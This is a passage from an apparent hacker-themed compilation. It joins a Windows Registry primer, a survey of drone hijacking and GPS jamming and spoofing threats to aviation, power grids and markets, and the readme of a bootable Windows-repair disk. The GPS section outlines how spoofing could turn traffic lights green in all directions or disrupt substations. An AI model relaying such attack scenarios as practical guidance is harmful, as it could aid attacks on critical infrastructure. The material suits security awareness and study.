HARDWARE stores information about the hardware devices that a computer detects when it starts up, so the subkeys in HARDWARE are also created during the booting process.
SAM is the abbreviation of Security Account Manager, a local security database. Subkeys in SAM contain the settings of users and work groups.
SECURITY includes the local security database from SAM, and a strict ACL controls which users can access the database.
SOFTWARE includes all of the configuration settings of programs. Information on the programs is stored in a standard format: HKLM\Software\Vendor\Program\Version.
SYSTEM contains the configuration settings of hardware drivers and services. The key path is HKEY_LOCAL_MACHINE\SYSTEM\ControlSetXXX, where XXX is a three-digit number starting from 000.
  2. HKEY_USERS (abbr. HKU). HKU is the other master key. It contains all of the per-user settings, for the current console user as well as other users who have logged on to this computer before. Double-clicking this entry shows at least three kinds of subkeys: .DEFAULT, SID, and SID_CLASSES. SID is the security identifier of the current console user, and SID_CLASSES contains per-user class registrations and file associations. Usually, we can also see S-1-5-18, S-1-5-19, and S-1-5-20, which represent the Local System Account, Local Service Account, and Network Service Account respectively.
  Unlike the two master keys above, HKEY_CLASSES_ROOT (abbr. HKCR), HKEY_CURRENT_USER (abbr. HKCU), and HKEY_CURRENT_CONFIG (abbr. HKCC) are derived keys: they only link to the two master keys and their subkeys.
  3. HKEY_CLASSES_ROOT (abbr. HKCR). HKCR merges two keys: HKLM\SOFTWARE\Classes and HKCU\Software\Classes. The first refers to the default registration classes, and the second refers to per-user registration classes and file associations.
  4. HKEY_CURRENT_USER (abbr. HKCU). HKCU links to a subkey of HKU, HKU\SID. This key allows all Windows programs and applications to create, access, modify, and store the information of the current console user without needing to determine which user is logged in.
  Under the root key HKCU, there are also five subkeys: Environment, Identities, Network, Software, and Volatile Environment.
Environment is about the environmental configurations.
Identities are related to Outlook Express.
Network contains settings to connect the mapped network drive.
Software refers to the user application settings.
Volatile Environment is used to define the environment variables for the particular user who logs on to the computer.
  5. HKEY_CURRENT_CONFIG (abbr. HKCC). HKCC is an image of the hardware configuration profile currently in use. It is a link to HKLM\SYSTEM\CurrentControlSet\Hardware Profiles\Current, which in turn points to HKLM\SYSTEM\CurrentControlSet\Hardware Profiles\XXXX, where XXXX is a four-digit number starting from 0000.
 Values
If we compare Windows folders and files with the Windows Registry, then keys and subkeys can be considered folders and subfolders, and the values of a key can be considered the files in a folder. Just like a file in Windows, a value also has its properties.
Name, type, and data are the three components of a value. Every value has a unique name, and the naming rules are similar to those for files: some special characters, such as "?" and "\", cannot appear in the name of a value. There are six major types of values: string, multistring, expandable string, binary, Dword, and Qword.
• String values are the easiest to understand because their data is recorded as plain, human-readable text.
• Multistring values hold a list of strings, separated from one another by a null character (ASCII code 00).
• Expandable string is another variant of the string value. An expandable string contains special variables such as %SYSTEMROOT% and %USERPROFILE%, which stand in for particular paths. For example, to locate the folder X:\Documents and Settings\username\Desktop, %USERPROFILE%\Desktop can be used no matter which drive Windows is installed on or which user logs on.
• Binary values also store strings, but the data is displayed in hex format, and the information stored is usually related to hardware.
• Unlike the above value types, the data stored in Dword and Qword values are numbers rather than strings of characters. Many such values are simple toggles (usually 1 for enabled and 0 for disabled), and in some cases small numbers, such as values up to 60, indicate timeout settings. The difference between Dword and Qword is that Dword stores 32-bit data and Qword stores 64-bit data.
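Because Dword and Qword values are stored in hive files as raw little-endian bytes, forensic tools must decode them before display. A minimal sketch in Python, using made-up byte strings rather than data from a real hive:

```python
import struct

# Hypothetical raw bytes as they might appear in a hive file (little-endian).
raw_dword = b"\x01\x00\x00\x00"                  # REG_DWORD: 32-bit
raw_qword = b"\x3c\x00\x00\x00\x00\x00\x00\x00"  # REG_QWORD: 64-bit

# "<I" = little-endian unsigned 32-bit; "<Q" = little-endian unsigned 64-bit.
dword_value = struct.unpack("<I", raw_dword)[0]
qword_value = struct.unpack("<Q", raw_qword)[0]

print(dword_value)  # 1  -- e.g. a toggle set to "enabled"
print(qword_value)  # 60 -- e.g. a 60-second timeout
```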

Hives
Hives are the physical files on the hard drive that back the two master keys of the Windows Registry.
The tree we view through Windows Registry Editor is a logical structure of the five root keys. If we use forensic tools to view the Windows Registry offline, or view the Registry remotely, only the two master keys will be listed; only the two master keys and their subkeys have hives. The hives of HKLM's subkeys are stored at %SYSTEMROOT%\System32\config, and the hives of HKU's subkeys are stored under %USERPROFILE%.
 

DRONES
United States military and intelligence agencies are increasingly relying on unmanned aerial vehicles but these military drones have long been an attractive target for hackers. And lately, it seems as though the hackers are gaining entrance more easily. How is this possible?
In 2011 a CIA drone was captured by Iranian hackers who managed to force the drone to land inside hostile territory so they could seize it and reverse-engineer its technology. A group of University of Texas at Austin students discovered how to hack and take control of Homeland Security drones used to patrol the U.S./Mexico border. The students tried to inform the USDHS, but were initially met with resistance until they arranged a demonstration. Both of these groups managed to scramble the drone’s GPS signals and feed it false location data to make it think it was somewhere it wasn’t.
With self-driving vehicles (which are really land-based drones) on the horizon and the FBI warning terrorists could use them to deliver car bombs in the future, these vulnerabilities have the potential for major disasters. Some cars are already vulnerable to hacking attacks. In 2010 researchers from the University of California and University of Washington demonstrated they could hack into a vehicle and disable the brakes.
Even if a hacked drone isn't captured, tapping into its camera feed could give enemy forces tactical advantages. In 2009 Iraqi militants were able to intercept drone footage, giving them insight into information available to military intelligence. The problem is that, by their nature, drones are remote-controlled and rely on wireless signals from outside. The programming languages used to write software for most military drones were not created specifically for the military; they have known vulnerabilities, which makes the software easier for hackers and engineers to crack. There are even "how-to" manuals for drone hackers freely available online.
Most of the information originally came from NATO research and studies. One of these studies was published just a month before the Iranian drone hijacking and could have played a part in the attack. It’s also not difficult to get the hardware and software necessary. The students were able to build their hijacking device for under $1,000. The Iraqi hackers used Russian software that’s normally used to steal satellite TV and available for just $26.
The United States Department of Defense is trying to counter these vulnerabilities by developing a new "unhackable" programming language from scratch. The new language is named Ivory and was expected to go into production on the Boeing Little Bird H-6U helicopter drone by the end of 2017, with a test flight of the new software using a Little Bird scheduled for that summer.

GPS Is Easy To Hack, And The U.S. Has No Backup
On August 5, 2016, Cathay Pacific Flight 905 from Hong Kong was heading for an on-time arrival at Manila’s Ninoy Aquino International Airport when something unexpected occurred. The pilots radioed air traffic controllers and said they had lost GPS (Global Positioning System) guidance for the final eight nautical miles to “runway right-24.”
Surprised, the controllers told the pilots to land the wide-body Boeing 777-300 using just their own eyes. The crew members pulled it off, but they were anxious the whole way in. Fortunately, skies were mostly clear that day.
The incident was not isolated. In July and August of that year, the International Civil Aviation Organization received more than 50 reports of GPS interference at the Manila airport alone. In some cases, pilots had to immediately speed up the plane and loop around the airport to try landing again. That kind of scramble can cause a crew to lose control of an aircraft. In a safety advisory issued this past April, the organization wrote that aviation is now dependent on uninterrupted access to satellite positioning, navigation and timing services and that vulnerabilities and threats to these systems are increasing.
In incidents involving at least four major airports in recent years, approaching pilots have suddenly lost GPS guidance. In June a passenger aircraft landing in Idaho nearly crashed into a mountain, according to NASA's Aviation Safety Reporting System. Only the intervention of an alert air traffic controller averted catastrophe. Security analysts and aerospace engineers who have studied the events say the likely cause in at least some instances is malicious interference. In the best-case scenario, GPS jamming will cause significant delays as pilots are forced to reroute a flight's last miles, costing airlines and passengers time and money, says Martin Lauth, a former air traffic controller who is now an associate professor of air traffic management at Florida's Embry-Riddle Aeronautical University. Crippled GPS could shut down an airport. If someone hacked GPS and instrument landing systems at the major airports in the greater New York City area, there would be no easy place to send arriving planes. Incoming transoceanic flights in particular would start to run out of fuel.
Although we think of GPS as a handy tool for finding our way to restaurants and meetups, the satellite constellation’s timing function is now a component of every one of the 16 infrastructure sectors deemed “critical” by the Department of Homeland Security (DHS). Cell-phone networks, financial markets, the electric grid, emergency services, and more all rely on the timing for basic operation. Yet GPS is vulnerable. Because of the great distance the radio waves must travel—more than 12,000 miles between satellites and receivers on Earth—the signals are weak and easily overridden, or “jammed,” as apparently happened in Manila. They are also easy to “spoof”: a slightly stronger signal from a software-defined radio—a broadcast that can be created by software on a laptop—can deliver a false message or replay an authentic message infused with false information, causing the receiver to believe it is somewhere, or somewhen, it is not.
In critical infrastructure, an error of a few microseconds can cause cascading failures that can throw off an entire network. Todd Humphreys, an associate professor of aerospace engineering at the University of Texas at Austin, as well as Dana Goward, a member of the U.S. National Space-Based Positioning, Navigation and Timing Advisory Board (a federal committee), and a former executive at a major defense contractor, each told Scientific American they now worry that a foreign adversary or terrorist group could coordinate multiple jamming and spoofing attacks against GPS receivers and severely degrade the functionality of the electric grid, cell-phone networks, stock markets, hospitals, airports, and more—all at once, without detection.
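The scale of the problem follows directly from the speed of light: a GPS receiver converts time into distance, so every microsecond of timing error translates into roughly 300 meters of ranging error. A quick check of the arithmetic:

```python
# Speed of light in vacuum, meters per second.
C = 299_792_458

def range_error_m(timing_error_s: float) -> float:
    """Ranging error introduced by a given receiver timing error."""
    return C * timing_error_s

print(round(range_error_m(1e-6)))   # ~300 m for one microsecond of error
print(round(range_error_m(40e-9)))  # ~12 m at GPS's ~40 ns clock accuracy
```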
 
The real shocker is that U.S. rivals do not face this vulnerability. China, Russia and Iran have terrestrial backup systems that GPS users can switch to and that are much more difficult to override than the satellite-based GPS system. The U.S. has failed to achieve a 2004 presidential directive to build such a backup. No actual U.S. calamities have happened yet; if they had, policy makers would have finally acted. But as disaster experts like to note, the U.S. always seems to prepare for the previous disaster, not the upcoming one.

DEPENDENCE BECOMES A TARGET
The current GPS is a network of 31 satellites known as Navstar, operated by space squadrons of the U.S. Air Force. To maintain accuracy, the squadrons deliver Coordinated Universal Time to the satellites, via a network of four antennas from Cape Canaveral to Kwajalein Atoll, up to three times a day as the satellites fly overhead. Thanks to each satellite's payload of atomic clocks, the time they keep is accurate to under 40 nanoseconds, after adjustments are made for general relativity, which makes the satellites' clocks tick about 45 microseconds a day faster than clocks on Earth, and special relativity, which makes them tick about seven microseconds a day slower.
Each satellite continually broadcasts a binary code on one of several frequencies. Military and civilian users get unique broadcasts, kept apart by special bits of code and by being 90 degrees out of phase with one another. The signals contain data packets that encode the time, the satellite's position at the moment of transmission, and the orbit and status of the other satellites. The GPS receiver in a smartphone figures out its location by calculating how long it takes the radio signals to travel from the transmitting satellites, which provides their distances from the phone. A minimum of four signals is required for a receiver to accurately determine its position and time, which is why you might lose your handy navigation guide amid the skyscrapers of lower Manhattan or the narrow alleyways of Venice. Critical infrastructure in the U.S. has numerous receivers that synchronize operations.
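The position fix described above can be sketched numerically: with four satellite positions and four pseudoranges (each the true range plus an unknown shared clock-bias distance), Newton iteration recovers both the receiver position and the clock bias. The satellite coordinates and units below are made up for illustration; real receivers work in Earth-centered coordinates with ranges around 20,000 km.

```python
import math

def solve4(A, b):
    # Gaussian elimination with partial pivoting for a 4x4 linear system.
    n = 4
    M = [row[:] + [b[i]] for i, row in enumerate(A)]
    for col in range(n):
        piv = max(range(col, n), key=lambda r: abs(M[r][col]))
        M[col], M[piv] = M[piv], M[col]
        for r in range(col + 1, n):
            f = M[r][col] / M[col][col]
            for c in range(col, n + 1):
                M[r][c] -= f * M[col][c]
    x = [0.0] * n
    for r in range(n - 1, -1, -1):
        x[r] = (M[r][n] - sum(M[r][c] * x[c] for c in range(r + 1, n))) / M[r][r]
    return x

def gps_fix(sats, pseudoranges, iters=15):
    # Unknowns: receiver position (x, y, z) and clock-bias distance b.
    x = y = z = b = 0.0
    for _ in range(iters):
        J, resid = [], []
        for (sx, sy, sz), rho in zip(sats, pseudoranges):
            dx, dy, dz = x - sx, y - sy, z - sz
            d = math.sqrt(dx * dx + dy * dy + dz * dz)
            # Each measurement models rho = distance-to-satellite + bias.
            J.append([dx / d, dy / d, dz / d, 1.0])
            resid.append(rho - (d + b))
        step = solve4(J, resid)
        x, y, z, b = x + step[0], y + step[1], z + step[2], b + step[3]
    return (x, y, z), b

# Made-up constellation: four satellites at known positions; the receiver
# sits at (1, 2, 3) with a clock bias worth 0.5 distance units.
sats = [(10, 0, 0), (0, 10, 0), (0, 0, 10), (10, 10, 10)]
truth, bias = (1.0, 2.0, 3.0), 0.5
rhos = [math.dist(truth, s) + bias for s in sats]

pos, est_bias = gps_fix(sats, rhos)
print([round(v, 6) for v in pos], round(est_bias, 6))
```

Note that with fewer than four satellites the system is underdetermined, which is why the text's minimum of four signals is a hard requirement, and why a spoofer who perturbs even one pseudorange corrupts both the position and the time solution.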
Hackers can jam a signal by drowning it out with meaningless noise, or they can spoof it by feeding the receiver false time or coordinates, which will disorient the receiver in time or space. Once one device has lost the correct time, it can send the spoofed time to other devices on its network, throwing off the entire complex and degrading its operation.
Industry is especially reliant on GPS because it is the most accurate timekeeping method on Earth and it is free. In the days before GPS, electric-grid operators could only estimate the load on their transmission lines, which led to inefficiencies; today GPS timing allows them to track the state of the grid and optimize operation in response to real-time demand. Financial markets once set their system time to a clock on the wall. Inaccurate timekeeping and uncoordinated transactions were widespread even after trading became computerized because early software used a clock inside a computer that was aligned by hand to the official time of the National Institute of Standards and Technology (NIST), the country’s timekeeper. Today’s financial systems, from a corner deli’s credit-card machine to stock markets, use GPS to time-stamp and verify transactions, freeing retailers from the need to transmit sales at the end of the day and enabling the worldwide, ultrahigh-frequency trading so prevalent now.
 
Cell-phone networks use GPS to break up, deliver and reassemble packets of data and to hand off calls from tower to tower as a phone moves. Electronic medical records are time-stamped with GPS time. Television networks use GPS to prove to advertisers that their commercials ran during the time slots they paid for. Worldwide, more than two billion GPS devices are used.
The great dependence on GPS is a tempting target. GPS is vulnerable and provides an opportunity for mayhem, and the capability to disrupt it has been shown. The only uncertain factor is whether an angry individual or group would choose GPS as a vehicle for an attack. The answer increasingly seems to be yes. “We now have ongoing demonstrations of state-sponsored spoofing,” Humphreys says.
One of those states is Russia. In March the Center for Advanced Defense Studies, a Washington, D.C., research nonprofit, identified nearly 10,000 incidents originating at 10 locations that included the Russian Federation, Crimea and Syria. Experts in the U.S. government and in academia say Iran and North Korea also have the capability. “Lots of countries and organizations” have it, Goward says.
A government adviser who has repeatedly warned Congress, a former executive at a defense contractor, and a former federal official who was speaking on background told Scientific American that a coordinated spoofing-jamming attack against various systems in the U.S. would be easy, cheap and disastrous. “It can be exercised on a massive and selective scale,” Goward says. A spoofing device costs about $5,000, and instructions are available online. Yet it is difficult to defend against: “Even a relatively trivial spoofing mitigation function against the most basic threats is far from simple to implement,” wrote Gerhard Berz, who works on navigation infrastructure for Eurocontrol, Europe’s air traffic control agency, in Inside GNSS, a trade magazine.
A large-scale, coordinated attack on U.S. infrastructure could be pulled off by 10 or 12 human operators with the right equipment, fanned out across the country. History was changed on September 11, 2001, by 19 Al Qaeda agents in the U.S., but hostile GPS disrupters would not need to have a suicidal devotion to God, the level of technical training required to fly a plane or the brutality to murder a cockpit crew. It is possible that the only thing stopping a GPS attack is international law, which recognizes electronic warfare as equivalent to violent acts if it brings about similar effects. Broad disablement of civil infrastructure would be likely to engender a U.S. military response, which at least so far may have dissuaded adversaries.

Although loss of life from a coordinated jamming-spoofing attack on GPS timing would probably be less than that on 9/11, the disabling effects could be more widespread. One scenario could involve changing stoplights at a few major intersections in various cities across the country to show green in all directions. A hacker in a nearby building would open a software-defined radio on a laptop. It would generate a false copy of the radio-frequency carrier, noise code and data bits from the provider of the global navigation satellite systems the traffic light was using. To induce the light to lock onto the bogus signal, the spoofer would disrupt the light’s regular tracking procedure, causing it to try to reacquire a signal. If the false signal were stronger, the light would likely select it. Now having access to the light’s controller, the hacker could feed it the incorrect time, activating the north-south signal’s green light before the east-west signal changed to red.
Several hackers at different intersections or in different cities could coordinate attacks. Or one of them could set off a cascade of intersection disruptions in one city. When I raised this scenario to a supervisor of traffic signal electricians in San Francisco who was closely involved with the city’s procurement of traffic signal cabinets, he did not think there was a means for anyone to wirelessly connect to the GPS and change its time setting. Yet the Garmin GPS modules that San Francisco uses in its lights employ no antispoofing protections; rather the manufacturer’s technical specifications state that to comply with Federal Communications Commission regulations, the Garmin device must accept any radio-frequency interference it encounters, even if it could scramble the module’s readout.
Not every city uses GPS to time traffic signals, but the alternatives are not necessarily better. Dale Picha, traffic operations manager for the Texas Department of Transportation’s San Antonio district, says the district has been moving away from individual GPS receivers on traffic signal cabinets, choosing to get the time from cell networks instead. But those can be spoofed, too.
People injured in traffic accidents might have to wait awhile for help because paramedics’ radios rely on GPS timing. When several GPS satellites provided incorrect time because of a glitch in 2016, virtually every emergency-responder system in North America experienced communications problems.
A larger target would be the global financial system. In a swampy part of New Jersey two miles from MetLife Stadium, trillions of dollars’ worth of financial instruments are traded every day in bits and bytes. The Equinix data center there hosts 49 exchanges, including the New York Stock Exchange. An error introduced in a GPS receiver that time-stamps stock transactions would “inject confusion into the operations of the financial industry,” says Andrew F. Bach, former global head of network services for the New York Stock Exchange. Seeing something amiss, computers—which now account for 60 percent of market volume, according to J.P. Morgan—might decide to sit on the sidelines. “When too many people head for the exits at the same time, we get a real problem,” says Andrew Lo, a professor of finance at the M.I.T. Sloan School of Management. “It can easily lead to a flash crash [a sudden and dramatic downturn in stock prices] or something much more long-lasting.” Noah Stoffman, an associate professor of finance at the Indiana University Kelley School of Business, says: “I can easily imagine that disrupting GPS would have catastrophic economic consequences.”
 
As markets reeled in New York, attackers could assault the electric grid in the heartland through a piece of hardware common at virtually every local substation. The Platte River Power Authority’s Fordham substation in Longmont, Colo., 35 miles north of Denver, near where I recently lived, is typical in its equipment and in its ease of reach by a concealed potential attacker. Sitting behind a 12-foot wall around the corner from a Holiday Inn Express, the open-air installation pares electricity in high-voltage transmission lines, generated at a big gas-fired power plant miles away, down to a level that local lines can feed to 348,000 home and business customers in Longmont and three nearby cities.
 
Scattered across the roughly six-acre facility are metal boxes containing phasor measurement units (PMUs), which monitor the status of the grid. The PMUs’ timing is set by a GPS. Jeff Dagle, an electrical engineer at Pacific Northwest National Laboratory, who is an expert on U.S. electricity networks, insists that because PMUs are not critical to the grid’s actual operation, spoofing them would not cause a blackout. But a September 2017 report from NIST maintains that a spoofing attack on PMUs could force a generator off-line. The sudden loss of several large generators, it says, “would create an instantaneous supply-demand imbalance and grid instability”—a potential blackout. Humphreys and his colleagues demonstrated such a timing failure in a lab environment. Although the PMUs are behind a wall, their GPS receivers could be spoofed from a hotel room a quarter of a mile away. There are 55,000 substations across the U.S.
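The reason PMU timing is so sensitive is simple arithmetic: a phasor's reported angle error grows linearly with the clock offset, at 360 degrees per cycle of the grid frequency. A minimal worked example, using the commonly cited figure that the roughly 1 percent total-vector-error limit of the IEEE C37.118 synchrophasor standard corresponds to about 0.57 degrees of pure angle error:

```python
# Phase-angle error a PMU reports when its GPS-derived time is off by dt:
#   theta_err = 360 degrees * f * dt   (f = nominal grid frequency)

def phase_error_deg(dt_seconds, freq_hz=60.0):
    return 360.0 * freq_hz * dt_seconds

# A spoofer that walks the receiver clock off by one millisecond
# induces a large, entirely fictitious phase shift:
print(phase_error_deg(1e-3))   # 21.6 degrees at 60 Hz

# ~0.573 degrees of pure angle error (the ~1% TVE limit) is used up
# by a clock offset of only about 26.5 microseconds:
print(round(0.573 / (360.0 * 60.0) * 1e6, 1))
```

In other words, a spoofer does not need to seize control of anything; dragging a receiver's clock by microseconds is enough to push synchrophasor data out of specification.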
 
Goward and Humphreys have warned utility executives about the danger they face, and they say few are aware. Fewer still, they maintain, have adequate contingency plans (some of which also rely on GPS). Human controllers who oversee grid networks “wouldn’t think to look at GPS as a possible source of the problem for probably hours,” Goward says. Furthermore, he notes, “attackers would be able to disguise what they’re doing for quite some time.”
 
Blackouts are costly and dangerous, but spoofing an airplane might provide the greatest drama. Humphreys and Eurocontrol’s Berz agree that it would be difficult but possible. Military aircraft use a device called a selective availability antispoofing module, but it is not required on civilian aircraft, and deployment is heavily restricted by the government. Lauth, who trains air traffic controllers, told me that pilots have other options for landing. The primary backup, however, is an airport’s instrument landing system, which provides aircraft with horizontal and vertical guidance and its distance from the landing spot. The system operates on radio waves and was built for safety, not security, so it is unencrypted—meaning a person can spoof it by inducing the aircraft’s receiver to lock onto a false signal.
Society’s reliance on GPS will only increase. The 5G-enabled Internet of Things will depend heavily on GPS because devices need precise timing to sync with one another and across networks. So will the “mirror world,” a digital representation of the real world that machines will need to produce for AI and augmented-reality applications.
 
Although the DHS acknowledges the threat, not everyone is pleased with what it is doing—or not doing—about it. James Platt, director of the position, navigation and timing office at the DHS, says the agency is working with NIST to outline varying levels of security for different receiver types. And the DHS conducts annual exercises that allow equipment manufacturers to test their machines against attack. The results are not public, but Logan Scott, a consultant who has worked with GPS for 40 years, says “a lot of receivers do not do well when exposed to jamming and spoofing.”

Antispoofing is a burgeoning field of research, with hundreds of papers published in the past several years. For example, during a spoofing attack, a vestige of the true GPS signal manifests on the receiver as distortion. Specialized receivers can monitor such distortion and give an alarm if it is detected, but the spoofer can generate a signal to nullify the distortion. “There is no foolproof defense,” Humphreys says. “What you can try is to price your opponent out of the game” by deploying antispoofing protections. Armed with the right equipment, though, a spoofer can overcome them. Protections and new threats are continually evolving in a kind of arms race in the radio-frequency spectrum. “If your opponent happens to be the Russian Federation,” Humphreys says, “good luck.”
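One of the cheapest defenses in this arms race is a sanity check on received signal power: to capture a receiver's tracking loops, a spoofer usually has to transmit noticeably hotter than the authentic satellite signal. The sketch below is an illustrative toy, not a fielded detector; the window size, threshold, and readings are made-up values.

```python
# Minimal sketch of one cheap antispoofing check: flag a sudden jump in
# received signal power above a trailing baseline, since a spoofer
# typically must overpower the authentic signal to take over tracking.
# Thresholds and window sizes here are illustrative, not field-tuned.

def power_alarm(samples_db, window=5, jump_db=3.0):
    """Return indices where a reading exceeds the average of the
    previous `window` readings by more than jump_db."""
    alarms = []
    for i in range(window, len(samples_db)):
        baseline = sum(samples_db[i - window:i]) / window
        if samples_db[i] - baseline > jump_db:
            alarms.append(i)
    return alarms

# Steady carrier-to-noise readings, then a spoofer keys up ~6 dB hot:
readings = [44.8, 45.1, 45.0, 44.9, 45.2, 45.0, 51.2, 51.0, 51.1]
print(power_alarm(readings))  # [6, 7, 8] -- alarm at onset and until
                              # the trailing baseline catches up
```

As the article notes, a careful spoofer can defeat this particular check by matching power closely, which is exactly why such monitors are layered with distortion detection and other techniques rather than used alone.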
An arms race could be defused if the U.S. built a backup timing system like the ones other countries maintain. In December 2018 President Donald Trump signed the National Timing Resilience and Security Act, which instructs the Department of Transportation (DOT) to build a “land-based, resilient, and reliable alternative timing system” by 2020. But neither the act nor the president has funded this undertaking.
The law was just the latest example of the U.S. government’s inadequate response, say critics such as Goward. The DHS issued a report on GPS vulnerability in 2001. President George W. Bush directed the DHS and the DOT to create a backup in 2004. The deputy defense secretary and deputy transportation secretary told Congress in 2015 that they would collaborate on a system known as eLoran (enhanced long-range navigation), which does exactly what the 2018 bill requires. Congress funded an eLoran pilot program years ago, but not a penny of that funding has been spent. Adam Sullivan, DOT assistant secretary for governmental affairs, told Peter DeFazio, chair of the House Transportation and Infrastructure Committee, in a May 8 letter that the DOT “is planning to conduct a field demonstration of technologies ... capable of providing backup [position, navigation and timing] services to critical infrastructure” by the end of 2019. In September the DOT issued a request for proposals, a week after Senator Ted Cruz of Texas and Senator Ed Markey of Massachusetts wrote the transportation secretary to ask what was taking so long.
 
An eLoran system would render jamming and spoofing almost irrelevant by delivering a low-frequency radio signal that is much stronger than GPS’s ultrahigh-frequency signal and hence is virtually impossible to override. The plan for eLoran would be to build about two dozen giant antennas necessary for nationwide coverage through a public-private partnership, according to Goward and to Representative John Garamendi of California, who has been prodding several administrations to act. The U.S. Air Force and the Pentagon are reportedly looking at other potential backup systems as well. The backups that various countries maintain are all essentially versions of eLoran.
 
Even if work begins tomorrow, eLoran will take years to build. It will be even longer before new devices and receivers that can pick up the signal are designed, manufactured and delivered to customers. “Four years is optimistic,” says Frank Prautzsch, a former director of network systems at Raytheon, who also worked on space systems at Hughes Space and Communications.
A different global patch would be to alter GPS signals at the satellite source with digital signatures that authenticate the data and deploy the public-private key infrastructure common to cryptography. But the signal coming from the current constellation of satellites cannot be changed. An air force spokesperson said no plans exist to incorporate digital signatures into the next generation of satellites, now being built at a secure Lockheed Martin facility west of Denver.
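The signature idea the article describes is usually proposed for GNSS in the form of TESLA-style delayed key disclosure (the approach behind Galileo's OSNMA and authentication proposals for GPS): each navigation message is MACed with a key the satellite discloses only later, and the keys form a one-way hash chain anchored in a publicly authenticated value, so a spoofer cannot forge future messages. The following is a minimal stdlib sketch of that idea, not any real broadcast format.

```python
import hashlib
import hmac

def make_chain(seed: bytes, n: int):
    """Key chain with k[n] = seed and k[i] = H(k[i+1]).
    chain[0] is the publicly authenticated anchor."""
    chain = [seed]
    for _ in range(n):
        chain.append(hashlib.sha256(chain[-1]).digest())
    chain.reverse()          # chain[0] = anchor, chain[n] = seed
    return chain

def mac(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.sha256).digest()

chain = make_chain(b"secret-seed", 4)
anchor = chain[0]            # distributed to receivers out of band

# Epoch 1: broadcast (msg, MAC under k1); disclose k1 one epoch later.
msg = b"ephemeris+clock data, epoch 1"
tag = mac(chain[1], msg)

# Receiver, once k1 is disclosed: verify the key, then the message.
k1 = chain[1]
assert hashlib.sha256(k1).digest() == anchor   # key chains to the anchor
assert hmac.compare_digest(mac(k1, msg), tag)  # message is authentic
print("verified")
```

Note that this authenticates the data, not the radio signal itself: a spoofer can still meacon (record and replay) authentic signals with a delay, which is why signature schemes are seen as one layer of defense rather than a complete fix.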
Despite all that, Platt is confident in critical infrastructure’s resilience. “We’ve talked with industry to make sure they have mitigation strategies in place,” he says. Goward’s response: “Suggest to Jim that we turn GPS off for 24 hours just to see what happens.”


FINALLY
A GIFT TO YOU
***************************************************************************
*                                                                         *
* DISCLAIMER: THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTIES!          *
*             THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE       *
*             CAUSED BY THE (MIS)USE OF THIS SOFTWARE                     *
*                                                                         *
***************************************************************************
...except some drivers may have to be loaded manually with the 'm' menu option after boot.
 ---The disk has now been tested with the following:
NT 3.51, NT 4, Windows 2000, Windows XP, Windows 2003 Server, Vista, Windows 7, Server 2008, Windows 8, Windows 8.1, Server 2012
As far as I know, all Service Pack versions of the above should be OK.
 ---To make a bootable USB drive / key:
1. Copy all files from this CD onto the USB drive. They cannot be in a subdirectory on the drive. You do not need to delete files already on the drive.
2. Install the bootloader:
   On the USB drive, there should now be a file named syslinux.exe (copied from this CD).
   Start a command line window (cmd.exe) with "run as administrator".
   From the command line, run the command:
      j:\syslinux.exe -ma j:
   (replace j with some other letter if your USB drive is on another drive letter than j:)
   On some drives, you may have to omit the -ma option if you get an error.
   If the command prints nothing, it has installed the bootloader.
Please note that you may have to adjust settings in your computer's BIOS setup to boot from USB. Some machines, especially older ones, simply won't boot from USB anyway.
Unfortunately, there are extremely many different versions of BIOS, and a lot of them are rather buggy when it comes to booting off different media, so I am unable to help you with BIOS problems.
 
SOURCE: THIS TESTAMENT HAS BEEN SOURCED FROM THE INTERNET AND BEARS NO ALLEGIANCE TO ANY ORGANISATION KNOWN OR UNKNOWN.
THE AUTHOR/COMPILER OF THIS TESTAMENT IS AN ENTHUSIASTIC COMPUTER ENGINEER WITH YEARS OF EXPERIENCE IN PROGRAMMING AND WEB KINEMATICS.
THIS TESTAMENT IS FOR ADVANCED COMPUTER USERS ONLY
 
 
